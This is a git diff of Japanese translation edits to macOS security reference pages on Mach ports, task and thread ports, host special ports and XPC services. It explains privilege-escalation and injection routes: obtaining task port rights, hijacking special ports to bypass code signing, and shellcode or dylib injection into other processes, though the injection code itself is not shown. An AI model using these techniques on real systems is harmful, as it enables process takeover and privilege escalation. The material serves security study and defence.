-例えば、`MACH_MSG_TYPE_MAKE_SEND_ONCE`は、このポートに対して**送信一次権限**を導出して転送することを**示す**ために使用できます。また、受信者が応答できないようにするために`MACH_PORT_NULL`を指定することもできます。 +例えば、`MACH_MSG_TYPE_MAKE_SEND_ONCE`は、このポートに対して**送信一回**の**権利**を導出し転送することを**示す**ために使用できます。また、受信者が応答できないように`MACH_PORT_NULL`を指定することもできます。 -簡単な**双方向通信**を実現するために、プロセスは**メッセージヘッダー**内に_応答ポート_(**`msgh_local_port`**)と呼ばれる**machポート**を指定することができ、メッセージの**受信者**はこのメッセージに**応答を送信**できます。 +簡単な**双方向通信**を実現するために、プロセスは**メッセージヘッダー**内に**リプライポート**(**`msgh_local_port`**)と呼ばれる**machポート**を指定することができ、メッセージの**受信者**はこのメッセージに**応答を送信**できます。 > [!TIP] -> この種の双方向通信は、再生を期待するXPCメッセージ(`xpc_connection_send_message_with_reply`および`xpc_connection_send_message_with_reply_sync`)で使用されることに注意してください。しかし、**通常は異なるポートが作成され**、前述のように双方向通信を作成します。 +> この種の双方向通信は、応答を期待するXPCメッセージで使用されることに注意してください(`xpc_connection_send_message_with_reply`および`xpc_connection_send_message_with_reply_sync`)。しかし、**通常は異なるポートが作成され**、前述のように双方向通信を作成します。 メッセージヘッダーの他のフィールドは次のとおりです: @@ -123,17 +123,17 @@ mach_msg_id_t msgh_id; - `msgh_id`: このメッセージのIDで、受信者によって解釈されます。 > [!CAUTION] -> **machメッセージは`mach port`を介して送信される**ことに注意してください。これは**単一受信者**、**複数送信者**の通信チャネルで、machカーネルに組み込まれています。**複数のプロセス**がmachポートに**メッセージを送信**できますが、いつでも**単一のプロセスのみが**それから読み取ることができます。 +> **machメッセージは`mach port`を介して送信される**ことに注意してください。これは**単一受信者**、**複数送信者**の通信チャネルで、machカーネルに組み込まれています。**複数のプロセス**がmachポートに**メッセージを送信**できますが、いつでも**単一のプロセスのみが**それを読み取ることができます。 -メッセージは、**`mach_msg_header_t`**ヘッダーの後に**本体**、および**トレーラー**(ある場合)で構成され、応答する権限を付与することができます。この場合、カーネルはメッセージを一つのタスクから別のタスクに渡すだけで済みます。 +メッセージは、**`mach_msg_header_t`**ヘッダーの後に**本体**と**トレーラー**(ある場合)で構成され、応答の許可を与えることができます。この場合、カーネルはメッセージを一つのタスクから別のタスクに渡すだけで済みます。 **トレーラー**は、カーネルによってメッセージに**追加される情報**(ユーザーによって設定できない)で、フラグ`MACH_RCV_TRAILER_`を使用してメッセージ受信時に要求できます(要求できる情報は異なります)。 #### 複雑なメッセージ -ただし、追加のポート権限を渡したり、メモリを共有したりするような、より**複雑な**メッセージもあります。この場合、カーネルはこれらのオブジェクトを受信者に送信する必要があります。この場合、ヘッダーの最上位ビット`msgh_bits`が設定されます。 +しかし、追加のポート権を渡したり、メモリを共有したりするような、より**複雑な**メッセージもあります。この場合、カーネルはこれらのオブジェクトを受信者に送信する必要があります。この場合、ヘッダーの最上位ビット`msgh_bits`が設定されます。 -渡す可能な記述子は、[**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)で定義されています: +渡す可能なディスクリプタは、[**`mach/message.h`**](https://opensource.apple.com/source/xnu/xnu-7195.81.3/osfmk/mach/message.h.auto.html)で定義されています: ```c #define MACH_MSG_PORT_DESCRIPTOR 0 #define MACH_MSG_OOL_DESCRIPTOR 1 @@ -155,20 +155,20 @@ In 32ビットでは、すべてのディスクリプタは12Bで、ディスク > [!CAUTION] > カーネルは、あるタスクから別のタスクにディスクリプタをコピーしますが、最初に**カーネルメモリにコピーを作成します**。この技術は「風水」として知られ、いくつかのエクスプロイトで悪用され、**カーネルがそのメモリにデータをコピーする**ことを可能にし、プロセスが自分自身にディスクリプタを送信します。その後、プロセスはメッセージを受信できます(カーネルがそれらを解放します)。 > -> また、**脆弱なプロセスにポート権を送信する**ことも可能で、ポート権はプロセスに表示されます(たとえそのプロセスがそれらを処理していなくても)。 +> また、**脆弱なプロセスにポート権を送信する**ことも可能で、ポート権はプロセスに現れます(たとえそのプロセスがそれらを扱っていなくても)。 ### Mac Ports APIs -ポートはタスクネームスペースに関連付けられているため、ポートを作成または検索するには、タスクネームスペースもクエリされます(詳細は`mach/mach_port.h`を参照): +ポートはタスクネームスペースに関連付けられているため、ポートを作成または検索するには、タスクネームスペースもクエリされます(`mach/mach_port.h`の詳細): - **`mach_port_allocate` | `mach_port_construct`**: **ポートを作成**します。 - `mach_port_allocate`は**ポートセット**も作成できます:ポートのグループに対する受信権。メッセージが受信されると、どのポートから受信されたかが示されます。 -- `mach_port_allocate_name`: ポートの名前を変更します(デフォルトは32ビット整数)。 -- `mach_port_names`: ターゲットからポート名を取得します。 -- `mach_port_type`: 名前に対するタスクの権利を取得します。 -- `mach_port_rename`: ポートの名前を変更します(FDのdup2のように)。 -- `mach_port_allocate`: 新しいRECEIVE、PORT_SETまたはDEAD_NAMEを割り当てます。 -- `mach_port_insert_right`: RECEIVEを持つポートに新しい権利を作成します。 +- `mach_port_allocate_name`: ポートの名前を変更します(デフォルトは32ビット整数) +- `mach_port_names`: ターゲットからポート名を取得します +- `mach_port_type`: 名前に対するタスクの権利を取得します +- `mach_port_rename`: ポートの名前を変更します(FDのdup2のように) +- `mach_port_allocate`: 新しいRECEIVE、PORT_SETまたはDEAD_NAMEを割り当てます +- `mach_port_insert_right`: RECEIVE権を持つポートに新しい権利を作成します - `mach_port_...` - **`mach_msg`** | **`mach_msg_overwrite`**: **machメッセージを送受信するために使用される関数**。オーバーライトバージョンでは、メッセージ受信のために異なるバッファを指定できます(他のバージョンはそれを再利用します)。 @@ -176,7 +176,7 @@ In 32ビットでは、すべてのディスクリプタは12Bで、ディスク **`mach_msg`**および**`mach_msg_overwrite`**関数はメッセージを送受信するために使用されるため、これらにブレークポイントを設定すると、送信されたメッセージと受信されたメッセージを検査できます。 -たとえば、デバッグ可能な任意のアプリケーションをデバッグし始めると、**`libSystem.B`がロードされ、この関数を使用します**。 +たとえば、デバッグ可能なアプリケーションをデバッグし始めると、**`libSystem.B`がロードされ、この関数を使用します**。 
(lldb) b mach_msg
 Breakpoint 1: where = libsystem_kernel.dylib`mach_msg, address = 0x00000001803f6c20
@@ -268,10 +268,10 @@ name      ipc-object    rights     flags   boost  reqs  recv  send sonce oref  q
 [...]
 ```
 **名前**はポートに与えられたデフォルトの名前です(最初の3バイトでどのように**増加**しているかを確認してください)。**`ipc-object`**はポートの**難読化された**一意の**識別子**です。\
-また、**`send`**権限のみを持つポートがそれを**所有している者を特定**していることにも注意してください(ポート名 + pid)。\
-さらに、**`+`**を使用して**同じポートに接続された他のタスク**を示していることにも注意してください。
+また、**`send`**権限のみを持つポートがそれを**所有している者を特定している**ことにも注意してください(ポート名 + pid)。\
+同じポートに**接続されている他のタスク**を示すために**`+`**が使用されていることにも注意してください。
 
-また、[**procesxp**](https://www.newosxbook.com/tools/procexp.html)を使用して、**登録されたサービス名**(`com.apple.system-task-port`の必要性によりSIPが無効になっている場合)も確認できます:
+また、[**procesxp**](https://www.newosxbook.com/tools/procexp.html)を使用して、**登録されたサービス名**(`com.apple.system-task-port`の必要性からSIPが無効になっている場合)も確認することができます:
 ```
 procesp 1 ports
 ```
@@ -279,7 +279,7 @@ procesp 1 ports
 
 ### コード例
 
-**送信者**がポートを**割り当て**、名前 `org.darlinghq.example` のために**送信権**を作成し、それを**ブートストラップサーバー**に送信する様子に注意してください。送信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**しました。
+**送信者**がポートを**割り当て**、名前 `org.darlinghq.example` のための**送信権**を作成し、それを**ブートストラップサーバー**に送信する様子に注意してください。送信者はその名前の**送信権**を要求し、それを使用して**メッセージを送信**しました。
 
 {{#tabs}}
 {{#tab name="receiver.c"}}
@@ -407,16 +407,16 @@ printf("Sent a message\n");
 
 ## 特権ポート
 
-特定のタスクが**SEND**権限を持っている場合、**特定の敏感なアクションを実行したり、特定の敏感なデータにアクセスしたりする**ことを可能にする特別なポートがあります。これにより、攻撃者の視点からこれらのポートは非常に興味深いものとなります。なぜなら、機能だけでなく、**タスク間でSEND権限を共有する**ことが可能だからです。
+特定のタスクがそれらに対して**SEND**権限を持つ場合、**特定の敏感なアクションを実行したり、特定の敏感なデータにアクセスしたりする**ことを可能にする特別なポートがあります。これにより、攻撃者の視点からこれらのポートは非常に興味深いものとなります。なぜなら、機能だけでなく、**タスク間でSEND権限を共有する**ことが可能だからです。
 
 ### ホスト特別ポート
 
 これらのポートは番号で表されます。
 
-**SEND**権利は**`host_get_special_port`**を呼び出すことで取得でき、**RECEIVE**権利は**`host_set_special_port`**を呼び出すことで取得できます。しかし、両方の呼び出しには**`host_priv`**ポートが必要で、これはルートのみがアクセスできます。さらに、過去にはルートが**`host_set_special_port`**を呼び出して任意のポートをハイジャックでき、例えば`HOST_KEXTD_PORT`をハイジャックすることでコード署名をバイパスすることができました(現在はSIPがこれを防止しています)。
+**SEND**権限は**`host_get_special_port`**を呼び出すことで取得でき、**RECEIVE**権限は**`host_set_special_port`**を呼び出すことで取得できます。しかし、両方の呼び出しには**`host_priv`**ポートが必要で、これはルートのみがアクセスできます。さらに、過去にはルートが**`host_set_special_port`**を呼び出して任意のポートをハイジャックでき、例えば`HOST_KEXTD_PORT`をハイジャックすることでコード署名をバイパスすることができました(現在はSIPがこれを防いでいます)。
 
 これらは2つのグループに分かれています:**最初の7つのポートはカーネルによって所有され**、1が`HOST_PORT`、2が`HOST_PRIV_PORT`、3が`HOST_IO_MASTER_PORT`、7が`HOST_MAX_SPECIAL_KERNEL_PORT`です。\
-**8**から始まる番号のポートは**システムデーモンによって所有され**、[**`host_special_ports.h`**](https://opensource.apple.com/source/xnu/xnu-4570.1.46/osfmk/mach/host_special_ports.h.auto.html)に宣言されています。
+番号**8**から始まるものは**システムデーモンによって所有され**、[**`host_special_ports.h`**](https://opensource.apple.com/source/xnu/xnu-4570.1.46/osfmk/mach/host_special_ports.h.auto.html)に宣言されています。
 
 - **ホストポート**:プロセスがこのポートに対して**SEND**権限を持っている場合、次のようなルーチンを呼び出すことで**システム**に関する**情報**を取得できます:
   - `host_processor_info`: プロセッサ情報を取得
@@ -424,7 +424,7 @@ printf("Sent a message\n");
   - `host_virtual_physical_table_info`: 仮想/物理ページテーブル(MACH_VMDEBUGが必要)
   - `host_statistics`: ホスト統計を取得
   - `mach_memory_info`: カーネルメモリレイアウトを取得
-- **ホスト特権ポート**:このポートに対して**SEND**権限を持つプロセスは、ブートデータを表示したり、カーネル拡張を読み込もうとしたりする**特権アクション**を実行できます。この**権限を取得するにはプロセスがルートである必要があります**。
+- **ホストプライベートポート**:このポートに対して**SEND**権限を持つプロセスは、ブートデータを表示したり、カーネル拡張を読み込もうとしたりする**特権アクション**を実行できます。この権限を取得するには**プロセスがルートである必要があります**。
 - さらに、**`kext_request`** APIを呼び出すには、他の権限**`com.apple.private.kext*`**が必要で、これはAppleのバイナリにのみ与えられます。
 - 呼び出すことができる他のルーチンは次のとおりです:
   - `host_get_boot_info`: `machine_boot_info()`を取得
@@ -434,7 +434,7 @@ printf("Sent a message\n");
   - `mach_vm_wire`: メモリを常駐させる
 - **ルート**はこの権限にアクセスできるため、`host_set_[special/exception]_port[s]`を呼び出して**ホスト特別または例外ポートをハイジャック**することができます。
 
-すべてのホスト特別ポートを表示するには、次のコマンドを実行できます:
+すべてのホスト特別ポートを表示するには、次のコマンドを実行することができます:
 ```bash
 procexp all ports | grep "HSP"
 ```
@@ -451,15 +451,15 @@ world.*/
 #define TASK_WIRED_LEDGER_PORT	5	/* Wired resource ledger for task. */
 #define TASK_PAGED_LEDGER_PORT	6	/* Paged resource ledger for task. */
 ```
-- **TASK_KERNEL_PORT**\[task-self send right]: このタスクを制御するために使用されるポート。タスクに影響を与えるメッセージを送信するために使用されます。これは**mach_task_self**によって返されるポートです(下記のタスクポートを参照)。
+- **TASK_KERNEL_PORT**\[task-self send right]: このタスクを制御するために使用されるポート。タスクに影響を与えるメッセージを送信するために使用されます。これは**mach_task_self (下記のタスクポートを参照)**によって返されるポートです。
 - **TASK_BOOTSTRAP_PORT**\[bootstrap send right]: タスクのブートストラップポート。その他のシステムサービスポートの返却を要求するメッセージを送信するために使用されます。
 - **TASK_HOST_NAME_PORT**\[host-self send right]: 含まれるホストの情報を要求するために使用されるポート。これは**mach_host_self**によって返されるポートです。
-- **TASK_WIRED_LEDGER_PORT**\[ledger send right]: このタスクがそのワイヤードカーネルメモリを引き出すソースを指定するポート。
-- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: このタスクがそのデフォルトのメモリ管理メモリを引き出すソースを指定するポート。
+- **TASK_WIRED_LEDGER_PORT**\[ledger send right]: このタスクがそのワイヤードカーネルメモリを引き出すソースを指定するポートです。
+- **TASK_PAGED_LEDGER_PORT**\[ledger send right]: このタスクがそのデフォルトのメモリ管理メモリを引き出すソースを指定するポートです。
 
 ### タスクポート
 
-元々Machには「プロセス」はなく、「タスク」があり、これはスレッドのコンテナのように考えられていました。MachがBSDと統合されたとき、**各タスクはBSDプロセスに関連付けられました**。したがって、すべてのBSDプロセスはプロセスとして必要な詳細を持ち、すべてのMachタスクもその内部動作を持っています(存在しないpid 0である`kernel_task`を除く)。
+元々Machには「プロセス」はなく、「タスク」があり、これはスレッドのコンテナのように考えられていました。MachがBSDと統合されたとき、**各タスクはBSDプロセスと相関関係にありました**。したがって、すべてのBSDプロセスはプロセスとして必要な詳細を持ち、すべてのMachタスクもその内部動作を持っています(存在しないpid 0である`kernel_task`を除く)。
 
 これに関連する非常に興味深い関数が2つあります:
 
@@ -474,7 +474,7 @@ world.*/
 - `task_[get/set]_special_port`
 - `thread_create`: スレッドを作成
 - `task_[get/set]_state`: タスクの状態を制御
-- その他の情報は[**mach/task.h**](https://github.com/phracker/MacOSX-SDKs/blob/master/MacOSX11.3.sdk/System/Library/Frameworks/Kernel.framework/Versions/A/Headers/mach/task.h)で見つけることができます。
+- その他の詳細は[**mach/task.h**](https://github.com/phracker/MacOSX-SDKs/blob/master/MacOSX11.3.sdk/System/Library/Frameworks/Kernel.framework/Versions/A/Headers/mach/task.h)で見つけることができます。
 
 > [!CAUTION]
 > 異なるタスクのタスクポートに対するSEND権を持つ場合、異なるタスクに対してそのようなアクションを実行することが可能です。
@@ -483,17 +483,17 @@ world.*/
 
 **カーネルもタスクであるため**、誰かが**`kernel_task`**に対する**SEND権限**を取得できれば、カーネルに何でも実行させることができます(脱獄)。
 
-- `mach_task_self()`を呼び出して、呼び出しタスクのこのポートの**名前を取得**します。このポートは**`exec()`**を通じてのみ**継承**されます。`fork()`で作成された新しいタスクは新しいタスクポートを取得します(特別なケースとして、suidバイナリの`exec()`後にタスクも新しいタスクポートを取得します)。タスクを生成し、そのポートを取得する唯一の方法は、`fork()`を行いながら["ポートスワップダンス"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html)を実行することです。
+- `mach_task_self()`を呼び出して、呼び出しタスクのこのポートの**名前を取得**します。このポートは**`exec()`**を通じてのみ**継承されます**; `fork()`で作成された新しいタスクは新しいタスクポートを取得します(特別なケースとして、suidバイナリの`exec()`後にタスクも新しいタスクポートを取得します)。タスクを生成し、そのポートを取得する唯一の方法は、`fork()`を行いながら["ポートスワップダンス"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html)を実行することです。
 - これらはポートにアクセスするための制限です(バイナリ`AppleMobileFileIntegrity`の`macos_task_policy`から):
 - アプリが**`com.apple.security.get-task-allow`権限**を持っている場合、**同じユーザーのプロセスがタスクポートにアクセスできます**(通常はデバッグのためにXcodeによって追加されます)。**ノータリゼーション**プロセスは、製品リリースではこれを許可しません。
 - **`com.apple.system-task-ports`**権限を持つアプリは、カーネルを除く**任意の**プロセスの**タスクポートを取得できます**。古いバージョンでは**`task_for_pid-allow`**と呼ばれていました。これはAppleのアプリケーションにのみ付与されます。
 - **ルートは**、**ハードンされた**ランタイムでコンパイルされていないアプリケーションのタスクポートにアクセスできます(Appleからではありません)。
 
-**タスク名ポート:** _タスクポート_の特権のないバージョン。タスクを参照しますが、制御することはできません。これを通じて利用できる唯一のものは`task_info()`のようです。
+**タスク名ポート:** _タスクポート_の特権のないバージョン。タスクを参照しますが、制御することはできません。これを通じて利用できる唯一のものは`task_info()`のようです。
 
 ### スレッドポート
 
-スレッドにも関連するポートがあり、これは**`task_threads`**を呼び出すタスクや`processor_set_threads`を持つプロセッサから見ることができます。スレッドポートに対するSEND権を持つと、`thread_act`サブシステムの関数を使用できます。例えば:
+スレッドにも関連するポートがあり、これは**`task_threads`**を呼び出すタスクや`processor_set_threads`を持つプロセッサから見ることができます。スレッドポートへのSEND権は、`thread_act`サブシステムの関数を使用することを可能にします:
 
 - `thread_terminate`
 - `thread_[get/set]_state`
@@ -504,9 +504,10 @@ world.*/
 
 任意のスレッドは**`mach_thread_sef`**を呼び出すことでこのポートを取得できます。
 
-### タスクポート経由のスレッドへのシェルコード注入
+### タスクポート経由でのスレッドへのシェルコード注入
+
+シェルコードを取得できます:
 
-シェルコードを取得するには:
 
 {{#ref}}
 ../../macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
@@ -768,17 +769,17 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
 ./inject 
 ```
 > [!TIP]
-> これをiOSで動作させるには、書き込み可能なメモリ実行可能ファイルを作成するために、`dynamic-codesigning`の権限が必要です。
+> これをiOSで動作させるには、書き込み可能なメモリ実行可能ファイルを作成するために`dynamic-codesigning`の権限が必要です。
 
 ### タスクポート経由のスレッドでのDylibインジェクション
 
 macOSでは、**スレッド**は**Mach**を介して、または**posix `pthread` api**を使用して操作できます。前回のインジェクションで生成したスレッドはMach apiを使用して生成されたため、**posix準拠ではありません**。
 
-**posix**準拠のapiを使用する必要がなかったため、**コマンドを実行するためのシンプルなシェルコードを注入することが可能でした**。しかし、**より複雑なインジェクション**では、**スレッド**も**posix準拠である必要があります**。
+**posix**準拠のapiを使用する必要がなかったため、**コマンドを実行するためのシンプルなシェルコードを注入することができました**。しかし、**より複雑なインジェクション**では、**スレッド**も**posix準拠である必要があります**。
 
-したがって、**スレッドを改善するためには**、**`pthread_create_from_mach_thread`**を呼び出す必要があります。これにより、**有効なpthreadが作成されます**。次に、この新しいpthreadが**dlopenを呼び出して**システムから**dylibをロード**できるようになります。したがって、異なるアクションを実行するために新しいシェルコードを書く代わりに、カスタムライブラリをロードすることが可能です。
+したがって、**スレッドを改善するためには**、**`pthread_create_from_mach_thread`**を呼び出す必要があります。これにより、**有効なpthread**が作成されます。この新しいpthreadは、システムから**dylibをロードするためにdlopenを呼び出すことができます**。そのため、異なるアクションを実行するために新しいシェルコードを書く代わりに、カスタムライブラリをロードすることが可能です。
 
-**例のdylibs**は次の場所にあります(例えば、ログを生成し、その後リッスンできるもの):
+**例のdylibs**は次の場所にあります(例えば、ログを生成し、その後リスニングできるもの):
 
 {{#ref}}
 ../macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries.md
@@ -1076,15 +1077,15 @@ macos-thread-injection-via-task-port.md
 
 ## 例外ポート
 
-スレッドで例外が発生すると、この例外はスレッドの指定された例外ポートに送信されます。スレッドがそれを処理しない場合、タスクの例外ポートに送信されます。タスクがそれを処理しない場合、ホストポートに送信され、launchdによって管理されます(ここで承認されます)。これを例外トリアージと呼びます。
+スレッドで例外が発生すると、この例外はスレッドの指定された例外ポートに送信されます。スレッドがそれを処理しない場合、タスクの例外ポートに送信されます。タスクがそれを処理しない場合、ホストポートに送信され、launchdによって管理されます(そこで承認されます)。これを例外トリアージと呼びます。
 
-通常、適切に処理されない場合、レポートはReportCrashデーモンによって処理されることになります。ただし、同じタスク内の別のスレッドが例外を管理することも可能であり、これが `PLCreashReporter` のようなクラッシュレポートツールが行うことです。
+通常、適切に処理されない場合、レポートはReportCrashデーモンによって処理されます。ただし、同じタスク内の別のスレッドが例外を管理することも可能であり、これが `PLCreashReporter` のようなクラッシュレポートツールが行うことです。
 
 ## その他のオブジェクト
 
 ### 時計
 
-任意のユーザーは時計に関する情報にアクセスできますが、時間を設定したり他の設定を変更したりするには、rootである必要があります。
+任意のユーザーは時計に関する情報にアクセスできますが、時間を設定したり他の設定を変更したりするにはroot権限が必要です。
 
 情報を取得するためには、`clock` サブシステムの関数を呼び出すことができます: `clock_get_time`、`clock_get_attributtes` または `clock_alarm`\
 値を変更するためには、`clock_priv` サブシステムを使用し、`clock_set_time` や `clock_set_attributes` のような関数を使用できます。
@@ -1103,9 +1104,9 @@ macos-thread-injection-via-task-port.md
 - `processor_set_info`
 
 [**この投稿**](https://reverse.put.as/2014/05/05/about-the-processor_set_tasks-access-to-kernel-memory-vulnerability/)で述べたように、過去には、**`processor_set_tasks`** を呼び出して他のプロセスのタスクポートを取得し、それらを制御するために、前述の保護を回避することができました。\
-現在では、その関数を使用するにはrootが必要であり、これは保護されているため、保護されていないプロセスでのみこれらのポートを取得できるようになります。
+現在では、その関数を使用するにはroot権限が必要であり、これは保護されているため、保護されていないプロセスでのみこれらのポートを取得できるようになります。
 
-以下のように試すことができます:
+以下のコードで試すことができます:
 
 

 
@@ -1220,6 +1221,7 @@ XPC, which stands for XNU (the kernel used by macOS) inter-Process Communication
 
 For more information about how this **communication work** on how it **could be vulnerable** check:
 
+
 {{#ref}}
 macos-xpc/
 {{#endref}}
@@ -1232,6 +1234,7 @@ MIC basically **generates the needed code** for server and client to communicate
 
 For more info check:
 
+
 {{#ref}}
 macos-mig-mach-interface-generator.md
 {{#endref}}
diff --git a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
index 3cf4a42c5..56c727f65 100644
--- a/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
+++ b/src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
@@ -4,7 +4,7 @@
 
 ## 基本情報
 
-XPCは、macOSで使用されるカーネルであるXNUのプロセス間通信の略で、macOSおよびiOS上の**プロセス間の通信**のためのフレームワークです。XPCは、システム上の異なるプロセス間で**安全で非同期のメソッド呼び出し**を行うためのメカニズムを提供します。これはAppleのセキュリティパラダイムの一部であり、各**コンポーネント**がその仕事を行うために必要な**権限のみ**で実行される**特権分離アプリケーション**の**作成**を可能にします。これにより、侵害されたプロセスからの潜在的な損害を制限します。
+XPCは、macOSで使用されるカーネルであるXNU(XNUは「X is Not Unix」の略)間のプロセス通信のためのフレームワークで、macOSおよびiOS上の**プロセス間の通信**を提供します。XPCは、システム上の異なるプロセス間で**安全で非同期のメソッド呼び出し**を行うためのメカニズムを提供します。これはAppleのセキュリティパラダイムの一部であり、各**コンポーネント**がその仕事を行うために必要な**権限のみ**で実行される**特権分離アプリケーション**の**作成**を可能にし、侵害されたプロセスからの潜在的な損害を制限します。
 
 XPCは、同じシステム上で実行されている異なるプログラムがデータを送受信するための一連のメソッドであるプロセス間通信(IPC)の一形態を使用します。
 
@@ -18,15 +18,15 @@ XPCの主な利点は以下の通りです:
 
 ## アプリケーション特有のXPCサービス
 
-アプリケーションのXPCコンポーネントは**アプリケーション自体の内部**にあります。たとえば、Safariでは**`/Applications/Safari.app/Contents/XPCServices`**に見つけることができます。これらは**`.xpc`**拡張子を持ち(例:**`com.apple.Safari.SandboxBroker.xpc`**)、メインバイナリの内部に**バンドル**されています:`/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker`および`Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`
+アプリケーションのXPCコンポーネントは**アプリケーション自体の内部**にあります。たとえば、Safariでは**`/Applications/Safari.app/Contents/XPCServices`**に見つけることができます。これらは**`.xpc`**拡張子(例:**`com.apple.Safari.SandboxBroker.xpc`**)を持ち、メインバイナリの内部に**バンドル**されています:`/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker`および`Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`
 
-あなたが考えているように、**XPCコンポーネントは他のXPCコンポーネントやメインアプリバイナリとは異なる権限と特権を持つ**ことになります。ただし、XPCサービスが**Info.plist**ファイルで**JoinExistingSession**を“True”に設定されている場合を除きます。この場合、XPCサービスは呼び出したアプリケーションと**同じセキュリティセッション**で実行されます。
+あなたが考えているように、**XPCコンポーネントは他のXPCコンポーネントやメインアプリバイナリとは異なる権限と特権を持ちます**。ただし、XPCサービスが**Info.plist**ファイルで**JoinExistingSession**を「True」に設定して構成されている場合を除きます。この場合、XPCサービスは呼び出したアプリケーションと**同じセキュリティセッション**で実行されます。
 
-XPCサービスは**launchd**によって必要に応じて**開始**され、すべてのタスクが**完了**するとシステムリソースを解放するために**シャットダウン**されます。**アプリケーション特有のXPCコンポーネントはアプリケーションによってのみ利用可能**であり、潜在的な脆弱性に関連するリスクを低減します。
+XPCサービスは**launchd**によって必要に応じて**開始され**、すべてのタスクが**完了**するとシステムリソースを解放するために**シャットダウン**されます。**アプリケーション特有のXPCコンポーネントはアプリケーションによってのみ利用可能**であり、潜在的な脆弱性に関連するリスクを低減します。
 
 ## システム全体のXPCサービス
 
-システム全体のXPCサービスはすべてのユーザーがアクセス可能です。これらのサービスは、launchdまたはMachタイプであり、**`/System/Library/LaunchDaemons`**、**`/Library/LaunchDaemons`**、**`/System/Library/LaunchAgents`**、または**`/Library/LaunchAgents`**などの指定されたディレクトリにあるplistファイルで**定義**する必要があります。
+システム全体のXPCサービスはすべてのユーザーがアクセス可能です。これらのサービスは、launchdまたはMachタイプであり、**`/System/Library/LaunchDaemons`**、**`/Library/LaunchDaemons`**、**`/System/Library/LaunchAgents`**、または**`/Library/LaunchAgents`**などの指定されたディレクトリにあるplistファイルで**定義する必要があります**。
 
 これらのplistファイルには、サービスの名前を持つ**`MachServices`**というキーと、バイナリへのパスを持つ**`Program`**というキーがあります:
 ```xml
@@ -62,65 +62,65 @@ cat /Library/LaunchDaemons/com.jamf.management.daemon.plist
 
 
 ```
-**`LaunchDameons`**内のものはrootによって実行されます。したがって、特権のないプロセスがこれらのいずれかと通信できる場合、特権を昇格させることができる可能性があります。
+**`LaunchDameons`** にあるものは root によって実行されます。したがって、特権のないプロセスがこれらのいずれかと通信できる場合、特権を昇格させることができる可能性があります。
 
-## XPCオブジェクト
+## XPC オブジェクト
 
 - **`xpc_object_t`**
 
-すべてのXPCメッセージは、シリアル化とデシリアル化を簡素化する辞書オブジェクトです。さらに、`libxpc.dylib`はほとんどのデータ型を宣言しているため、受信したデータが期待される型であることを確認できます。C APIでは、すべてのオブジェクトは`xpc_object_t`であり(その型は`xpc_get_type(object)`を使用して確認できます)。\
-さらに、`xpc_copy_description(object)`関数を使用して、デバッグ目的に役立つオブジェクトの文字列表現を取得できます。\
-これらのオブジェクトには、`xpc__copy`、`xpc__equal`、`xpc__hash`、`xpc__serialize`、`xpc__deserialize`などの呼び出し可能なメソッドもあります。
+すべての XPC メッセージは、シリアル化とデシリアル化を簡素化する辞書オブジェクトです。さらに、`libxpc.dylib` はほとんどのデータ型を宣言しているため、受信したデータが期待される型であることを確認できます。C API では、すべてのオブジェクトは `xpc_object_t` であり(その型は `xpc_get_type(object)` を使用して確認できます)。\
+さらに、`xpc_copy_description(object)` 関数を使用して、デバッグ目的に役立つオブジェクトの文字列表現を取得できます。\
+これらのオブジェクトには、`xpc__copy`、`xpc__equal`、`xpc__hash`、`xpc__serialize`、`xpc__deserialize` などの呼び出し可能なメソッドもあります。
 
-`xpc_object_t`は、`xpc__create`関数を呼び出すことで作成され、内部的に`_xpc_base_create(Class, Size)`を呼び出し、オブジェクトのクラスの型(`XPC_TYPE_*`のいずれか)とそのサイズ(メタデータ用に追加の40Bがサイズに加算されます)が指定されます。つまり、オブジェクトのデータはオフセット40Bから始まります。\
-したがって、`xpc__t`は`xpc_object_t`のサブクラスのようなものであり、`os_object_t*`のサブクラスになります。
+`xpc_object_t` は、`xpc__create` 関数を呼び出すことで作成され、内部的に `_xpc_base_create(Class, Size)` を呼び出し、オブジェクトのクラスの型(`XPC_TYPE_*` のいずれか)とそのサイズ(メタデータ用に追加の 40B がサイズに加算されます)を指定します。つまり、オブジェクトのデータはオフセット 40B から始まります。\
+したがって、`xpc__t` は `xpc_object_t` のサブクラスのようなものであり、`os_object_t*` のサブクラスになります。
 
 > [!WARNING]
-> `xpc_dictionary_[get/set]_`を使用して、キーの型と実際の値を取得または設定するのは開発者であるべきです。
+> `xpc_dictionary_[get/set]_` を使用して、キーの型と実際の値を取得または設定するのは開発者であるべきです。
 
 - **`xpc_pipe`**
 
-**`xpc_pipe`**は、プロセスが通信するために使用できるFIFOパイプです(通信はMachメッセージを使用します)。\
-特定のMachポートを使用して作成するために、`xpc_pipe_create()`または`xpc_pipe_create_from_port()`を呼び出すことでXPCサーバーを作成できます。次に、メッセージを受信するには、`xpc_pipe_receive`および`xpc_pipe_try_receive`を呼び出すことができます。
+**`xpc_pipe`** は、プロセスが通信するために使用できる FIFO パイプです(通信は Mach メッセージを使用します)。\
+特定の Mach ポートを使用して作成するには、`xpc_pipe_create()` または `xpc_pipe_create_from_port()` を呼び出して XPC サーバーを作成できます。次に、メッセージを受信するには `xpc_pipe_receive` および `xpc_pipe_try_receive` を呼び出すことができます。
 
